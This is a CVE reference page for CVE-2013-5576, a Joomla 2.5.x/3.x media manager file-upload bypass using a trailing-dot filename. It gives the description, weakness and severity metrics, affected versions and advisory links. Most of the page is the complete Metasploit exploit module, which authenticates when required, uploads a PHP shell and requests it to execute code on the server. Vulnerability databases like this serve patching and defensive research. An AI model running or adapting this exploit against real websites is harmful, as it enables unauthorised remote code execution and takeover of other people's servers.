CVE-2013-5576 : Detail

CVE-2013-5576

A03-Injection
77.3%V3
Network
2013-10-09
12h44 +00:00
2013-12-01
16h26 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

administrator/components/com_media/helpers/media.php in the media manager in Joomla! 2.5.x before 2.5.14 and 3.x before 3.1.5 allows remote authenticated users or remote attackers to bypass intended access restrictions and upload files with dangerous extensions via a filename with a trailing . (dot), as exploited in the wild in August 2013.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-20 Improper Input Validation
The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly.

Metrics

Metrics Score Severity CVSS Vector Source
V2 6.8 AV:N/AC:M/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 27610

Publication date : 2013-08-14 22h00 +00:00
Author : Metasploit
EDB Verified : Yes

## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper def initialize(info={}) super(update_info(info, 'Name' => "Joomla Media Manager File Upload Vulnerability", 'Description' => %q{ This module exploits a vulnerability found in Joomla 2.5.x up to 2.5.13, as well as 3.x up to 3.1.4 versions. The vulnerability exists in the Media Manager component, which comes by default in Joomla, allowing arbitrary file uploads, and results in arbitrary code execution. The module has been tested successfully on Joomla 2.5.13 and 3.1.4 on Ubuntu 10.04. Note: If public access isn't allowed to the Media Manager, you will need to supply a valid username and password (Editor role or higher) in order to work properly. }, 'License' => MSF_LICENSE, 'Author' => [ 'Jens Hinrichsen', # Vulnerability discovery according to the OSVDB 'juan vazquez' # Metasploit module ], 'References' => [ [ 'OSVDB', '95933' ], [ 'URL', 'http://developer.joomla.org/security/news/563-20130801-core-unauthorised-uploads' ], [ 'URL', 'http://www.cso.com.au/article/523528/joomla_patches_file_manager_vulnerability_responsible_hijacked_websites/' ], [ 'URL', 'https://github.com/joomla/joomla-cms/commit/fa5645208eefd70f521cd2e4d53d5378622133d8' ], [ 'URL', 'http://niiconsulting.com/checkmate/2013/08/critical-joomla-file-upload-vulnerability/' ] ], 'Payload' => { 'DisableNops' => true, # Arbitrary big number. The payload gets sent as POST data, so # really it's unlimited 'Space' => 262144, # 256k }, 'Platform' => ['php'], 'Arch' => ARCH_PHP, 'Targets' => [ [ 'Joomla 2.5.x <=2.5.13', {} ] ], 'Privileged' => false, 'DisclosureDate' => "Aug 01 2013", 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [true, 'The base path to Joomla', '/joomla']), OptString.new('USERNAME', [false, 'User to login with', '']), OptString.new('PASSWORD', [false, 'Password to login with', '']), ], self.class) end def peer return "#{rhost}:#{rport}" end def check res = get_upload_form if res and res.code == 200 if res.body =~ /You are not authorised to view this resource/ print_status("#{peer} - Joomla Media Manager Found but authentication required") return Exploit::CheckCode::Detected elsif res.body =~ /<form action="(.*)" id="uploadForm"/ print_status("#{peer} - Joomla Media Manager Found and authentication isn't required") return Exploit::CheckCode::Detected end end return Exploit::CheckCode::Safe end def upload(upload_uri) begin u = URI(upload_uri) rescue ::URI::InvalidURIError fail_with(Exploit::Failure::Unknown, "Unable to get the upload_uri correctly") end data = Rex::MIME::Message.new data.add_part(payload.encoded, "application/x-php", nil, "form-data; name=\"Filedata[]\"; filename=\"#{@upload_name}.\"") post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_') res = send_request_cgi({ 'method' => 'POST', 'uri' => "#{u.path}?#{u.query}", 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'cookie' => @cookies, 'vars_get' => { 'asset' => 'com_content', 'author' => '', 'format' => '', 'view' => 'images', 'folder' => '' }, 'data' => post_data }) return res end def get_upload_form res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, "index.php"), 'cookie' => @cookies, 'encode_params' => false, 'vars_get' => { 'option' => 'com_media', 'view' => 'images', 'tmpl' => 'component', 'e_name' => 'jform_articletext', 'asset' => 'com_content', 'author' => '' } }) return res end def get_login_form res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, "index.php", "component", "users", "/"), 'cookie' => @cookies, 'vars_get' => { 'view' => 'login' } }) return res end def login res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, "index.php", "component", "users", "/"), 'cookie' => @cookies, 'vars_get' => { 'task' => 'user.login' }, 'vars_post' => { 'username' => @username, 'password' => @password }.merge(@login_options) }) return res end def parse_login_options(html) html.scan(/<input type="hidden" name="(.*)" value="(.*)" \/>/) {|option| @login_options[option[0]] = option[1] if option[1] == "1" # Searching for the Token Parameter, which always has value "1" } end def exploit @login_options = {} @cookies = "" @upload_name = "#{rand_text_alpha(rand(5) + 3)}.php" @username = datastore['USERNAME'] @password = datastore['PASSWORD'] print_status("#{peer} - Checking Access to Media Component...") res = get_upload_form if res and res.code == 200 and res.headers['Set-Cookie'] and res.body =~ /You are not authorised to view this resource/ print_status("#{peer} - Authentication required... Proceeding...") if @username.empty? or @password.empty? fail_with(Exploit::Failure::BadConfig, "#{peer} - Authentication is required to access the Media Manager Component, please provide credentials") end @cookies = res.get_cookies.sub(/;$/, "") print_status("#{peer} - Accessing the Login Form...") res = get_login_form if res.nil? or res.code != 200 or res.body !~ /login/ fail_with(Exploit::Failure::Unknown, "#{peer} - Unable to Access the Login Form") end parse_login_options(res.body) res = login if not res or res.code != 303 fail_with(Exploit::Failure::NoAccess, "#{peer} - Unable to Authenticate") end elsif res and res.code ==200 and res.headers['Set-Cookie'] and res.body =~ /<form action="(.*)" id="uploadForm"/ print_status("#{peer} - Authentication isn't required.... Proceeding...") @cookies = res.get_cookies.sub(/;$/, "") else fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Failed to Access the Media Manager Component") end print_status("#{peer} - Accessing the Upload Form...") res = get_upload_form if res and res.code == 200 and res.body =~ /<form action="(.*)" id="uploadForm"/ upload_uri = Rex::Text.html_decode($1) else fail_with(Exploit::Failure::Unknown, "#{peer} - Unable to Access the Upload Form") end print_status("#{peer} - Uploading shell...") res = upload(upload_uri) if res.nil? or res.code != 200 fail_with(Exploit::Failure::Unknown, "#{peer} - Upload failed") end register_files_for_cleanup("#{@upload_name}.") print_status("#{peer} - Executing shell...") send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, "images", @upload_name), }) end end

Products Mentioned

Configuraton 0

Joomla>>Joomla\! >> Version 2.5.0

Joomla>>Joomla\! >> Version 2.5.1

Joomla>>Joomla\! >> Version 2.5.2

Joomla>>Joomla\! >> Version 2.5.3

Joomla>>Joomla\! >> Version 2.5.4

Joomla>>Joomla\! >> Version 2.5.5

Joomla>>Joomla\! >> Version 2.5.6

Joomla>>Joomla\! >> Version 2.5.7

Joomla>>Joomla\! >> Version 2.5.8

Joomla>>Joomla\! >> Version 2.5.9

Joomla>>Joomla\! >> Version 2.5.10

Joomla>>Joomla\! >> Version 2.5.11

Joomla>>Joomla\! >> Version 2.5.12

Joomla>>Joomla\! >> Version 2.5.13

Configuraton 0

Joomla>>Joomla\! >> Version 3.0.0

Joomla>>Joomla\! >> Version 3.0.1

Joomla>>Joomla\! >> Version 3.0.2

Joomla>>Joomla\! >> Version 3.0.3

Joomla>>Joomla\! >> Version 3.0.4

Joomla>>Joomla\! >> Version 3.1.0

Joomla>>Joomla\! >> Version 3.1.1

Joomla>>Joomla\! >> Version 3.1.2

Joomla>>Joomla\! >> Version 3.1.3

Joomla>>Joomla\! >> Version 3.1.4

References

http://www.exploit-db.com/exploits/27610
Tags : exploit, x_refsource_EXPLOIT-DB
http://www.kb.cert.org/vuls/id/639620
Tags : third-party-advisory, x_refsource_CERT-VN
http://seclists.org/oss-sec/2013/q3/486
Tags : mailing-list, x_refsource_MLIST
http://seclists.org/oss-sec/2013/q3/484
Tags : mailing-list, x_refsource_MLIST